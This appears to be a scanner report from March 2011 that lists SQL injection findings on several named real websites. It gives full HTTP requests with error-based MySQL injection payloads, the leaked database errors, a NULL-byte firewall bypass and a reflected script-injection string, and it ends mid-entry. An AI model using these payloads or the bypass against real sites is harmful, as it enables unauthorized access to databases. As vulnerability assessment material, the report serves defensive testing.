GET /ppc/leadflow/hins00/project.php?catId=50002'&iusrc=%27%2B(select+1+and+row(1%2c1)%3E(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B%27 HTTP/1.1 Host: www.insideup.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=253555158.1300018899.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/13; _msuuid_zbygse58m0=0291FF4C-46CC-491C-85AD-35386C724DCE; OAID=f3931b205fed176e3aba403e9465c710; __unam=85a0ee8-12eaf3cfa61-6a1761aa-2; PHPSESSID=vov3lvi3rnk1p5rdd8gdke24o1; __utma=253555158.1232491105.1300018899.1300065868.1301080607.3; __utmc=253555158; __utmb=253555158.1.10.1301080607
Response 1
HTTP/1.1 200 OK Date: Fri, 25 Mar 2011 19:16:37 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Content-Length: 5063 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... ),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'leadflow/hins00/project.php?catId=50002'&iusrc='+(select 1 and row(1,1)> ...[SNIP]...
Request 2
GET /ppc/leadflow/hins00/project.php?catId=50002''&iusrc=%27%2B(select+1+and+row(1%2c1)%3E(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B%27 HTTP/1.1 Host: www.insideup.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=253555158.1300018899.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/13; _msuuid_zbygse58m0=0291FF4C-46CC-491C-85AD-35386C724DCE; OAID=f3931b205fed176e3aba403e9465c710; __unam=85a0ee8-12eaf3cfa61-6a1761aa-2; PHPSESSID=vov3lvi3rnk1p5rdd8gdke24o1; __utma=253555158.1232491105.1300018899.1300065868.1301080607.3; __utmc=253555158; __utmb=253555158.1.10.1301080607
Response 2
HTTP/1.1 200 OK Date: Fri, 25 Mar 2011 19:16:38 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Content-Length: 4888 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]...
The iusrc parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the iusrc parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /ppc/leadflow/hins00/project.php?catId=50002&iusrc=%27%2B(select+1+and+row(1%2c1)%3E(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B%27' HTTP/1.1 Host: www.insideup.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=253555158.1300018899.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/13; _msuuid_zbygse58m0=0291FF4C-46CC-491C-85AD-35386C724DCE; OAID=f3931b205fed176e3aba403e9465c710; __unam=85a0ee8-12eaf3cfa61-6a1761aa-2; PHPSESSID=vov3lvi3rnk1p5rdd8gdke24o1; __utma=253555158.1232491105.1300018899.1300065868.1301080607.3; __utmc=253555158; __utmb=253555158.1.10.1301080607
Response 1
HTTP/1.1 200 OK Date: Fri, 25 Mar 2011 19:16:51 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Content-Length: 5063 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... ,concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+''/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'leadflow/hins00/project.php?catId=50002&iusrc='+(select 1 and row(1,1)> ...[SNIP]...
Request 2
GET /ppc/leadflow/hins00/project.php?catId=50002&iusrc=%27%2B(select+1+and+row(1%2c1)%3E(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B%27'' HTTP/1.1 Host: www.insideup.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=253555158.1300018899.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/13; _msuuid_zbygse58m0=0291FF4C-46CC-491C-85AD-35386C724DCE; OAID=f3931b205fed176e3aba403e9465c710; __unam=85a0ee8-12eaf3cfa61-6a1761aa-2; PHPSESSID=vov3lvi3rnk1p5rdd8gdke24o1; __utma=253555158.1232491105.1300018899.1300065868.1301080607.3; __utmc=253555158; __utmb=253555158.1.10.1301080607
Response 2
HTTP/1.1 200 OK Date: Fri, 25 Mar 2011 19:16:52 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Content-Length: 4888 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]...
1.18. http://www.insideup.com/ppc/leadflow/hins00/project.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.insideup.com
Path:
/ppc/leadflow/hins00/project.php
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /ppc/leadflow/hins00/project.php?catId=50002&iusrc=%27%2B(select+1+and+row(1%2c1)%3E(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B%27&1'=1 HTTP/1.1 Host: www.insideup.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=253555158.1300018899.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/13; _msuuid_zbygse58m0=0291FF4C-46CC-491C-85AD-35386C724DCE; OAID=f3931b205fed176e3aba403e9465c710; __unam=85a0ee8-12eaf3cfa61-6a1761aa-2; PHPSESSID=vov3lvi3rnk1p5rdd8gdke24o1; __utma=253555158.1232491105.1300018899.1300065868.1301080607.3; __utmc=253555158; __utmb=253555158.1.10.1301080607
Response 1
HTTP/1.1 200 OK Date: Fri, 25 Mar 2011 19:19:30 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Content-Length: 5103 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... cat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&1'=1/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' OR prj.project_page_url = 'leadflow/hins00/project.php?catId=50002&iusrc='+(se' at line 5
Request 2
GET /ppc/leadflow/hins00/project.php?catId=50002&iusrc=%27%2B(select+1+and+row(1%2c1)%3E(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B%27&1''=1 HTTP/1.1 Host: www.insideup.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=253555158.1300018899.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/13; _msuuid_zbygse58m0=0291FF4C-46CC-491C-85AD-35386C724DCE; OAID=f3931b205fed176e3aba403e9465c710; __unam=85a0ee8-12eaf3cfa61-6a1761aa-2; PHPSESSID=vov3lvi3rnk1p5rdd8gdke24o1; __utma=253555158.1232491105.1300018899.1300065868.1301080607.3; __utmc=253555158; __utmb=253555158.1.10.1301080607
Response 2
HTTP/1.1 200 OK Date: Fri, 25 Mar 2011 19:19:31 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Content-Length: 4928 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]...
1.19. http://www.insideup.com/ppc/leadflow/hins00/project.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.insideup.com
Path:
/ppc/leadflow/hins00/project.php
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request
GET /ppc/leadflow/hins00/project.php?catId=50002&iusrc=%27%2B(select+1+and+row(1%2c1)%3E(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2/1'B%27 HTTP/1.1 Host: www.insideup.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=253555158.1300018899.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/13; _msuuid_zbygse58m0=0291FF4C-46CC-491C-85AD-35386C724DCE; OAID=f3931b205fed176e3aba403e9465c710; __unam=85a0ee8-12eaf3cfa61-6a1761aa-2; PHPSESSID=vov3lvi3rnk1p5rdd8gdke24o1; __utma=253555158.1232491105.1300018899.1300065868.1301080607.3; __utmc=253555158; __utmb=253555158.1.10.1301080607
Response
HTTP/1.1 200 OK Date: Fri, 25 Mar 2011 19:19:35 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Content-Length: 5103 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... cat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))%2/1'B'/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''B'' OR prj.project_page_url = 'leadflow/hins00/project.php?catId=50002&iusrc='+' at line 5
The CareerID parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the CareerID parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request
GET /careers.php?CategoryID=(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))&CareerID=17'&SectionID=380 HTTP/1.1 Host: www.nutter.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Fri, 25 Mar 2011 19:09:14 GMT Server: Apache/1.3.42 Ben-SSL/1.60 (Unix) PHP/4.4.9 with Suhosin-Patch X-Powered-By: PHP/4.4.9 Content-Type: text/html Content-Length: 15946
<!-- careers start -->
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/2000/REC-xhtml1-20000126/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999 ...[SNIP]... </div> error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1 | 1064<BR> ...[SNIP]...
The CategoryID parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the CategoryID parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request
GET /careers.php?CategoryID=(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))'&CareerID=17&SectionID=380 HTTP/1.1 Host: www.nutter.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Fri, 25 Mar 2011 19:08:37 GMT Server: Apache/1.3.42 Ben-SSL/1.60 (Unix) PHP/4.4.9 with Suhosin-Patch X-Powered-By: PHP/4.4.9 Content-Type: text/html Content-Length: 15841
<!-- careers start -->
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/2000/REC-xhtml1-20000126/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999 ...[SNIP]... <br /> error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\' LIMIT 1' at line 1 | 1064<BR> ...[SNIP]...
The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 2, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request
GET /archives/'+NSFTW+''?ordering=&searchphrase=all HTTP/1.1 Host: www.soundingsonline.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 25 Mar 2011 19:19:15 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Type: text/html; charset=utf-8 Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Fri, 25 Mar 2011 19:19:15 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache
<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?ordering=&searchphrase=all' AND cookie_info=''' at line 1</font> ...[SNIP]...
1.23. http://www.soundingsonline.com/archives/'+NSFTW+' [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.soundingsonline.com
Path:
/archives/'+NSFTW+'
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request
GET /archives/'+NSFTW+'?ordering=&searchphrase=all&1'=1 HTTP/1.1 Host: www.soundingsonline.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 25 Mar 2011 19:17:46 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Type: text/html; charset=utf-8 Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Fri, 25 Mar 2011 19:17:46 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache
<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font> ...[SNIP]...
The ordering parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the ordering parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request
GET /archives/'+NSFTW+'?ordering='&searchphrase=all HTTP/1.1 Host: www.soundingsonline.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 25 Mar 2011 19:13:57 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Type: text/html; charset=utf-8 Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Fri, 25 Mar 2011 19:13:57 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache
<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font> ...[SNIP]...
The searchphrase parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the searchphrase parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request
GET /archives/'+NSFTW+'?ordering=&searchphrase=all' HTTP/1.1 Host: www.soundingsonline.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 25 Mar 2011 19:15:26 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Type: text/html; charset=utf-8 Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Fri, 25 Mar 2011 19:15:26 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache
<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''?ordering=&searchphrase=all'' AND cookie_info=''' at line 1</font> ...[SNIP]...
The trafficSource cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the trafficSource cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /help/direct-mail HTTP/1.1 Host: www.supermedia.com Connection: keep-alive Referer: https://www.supermedia.com/help User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JSESSIONID=4487424B77C0217B5BAEF5DAE41C714C.app4-a2; trafficSource=default%00'; CstrStatus=RVU; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a42378b; mbox=session#1301080493266-271579#1301083842|check#true#1301082042; s_cc=true; undefined_s=First%20Visit; s_sq=%5B%5BB%5D%5D
Response 1
HTTP/1.1 200 OK Server: Unspecified Date: Fri, 25 Mar 2011 19:39:41 GMT Content-Type: text/html;charset=UTF-8 Content-Language: en-US Connection: close Cache-Control: private Content-Length: 26678
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en-US"> <head>
<title>Ddirect Mail</title>
<link type="text/css" rel="st ...[SNIP]... e, server, and channel on the next lines. */ s.channel=""; s.pagetype=""; s.server=""; s.referrer="http://www.google.com/search?hl=en&q=ac3d5"-alert(1)-"2bfe3cee0a"; s.pageName=""; s.prop1="Processing Error Title"; s.prop2=""; s.prop3="Not Logged in"; s.prop4=""; s.prop5=""; s.prop6="General Exception"; s.prop7="No such flow definition with id '(select 1 and row(1,1)> ...[SNIP]...
Request 2
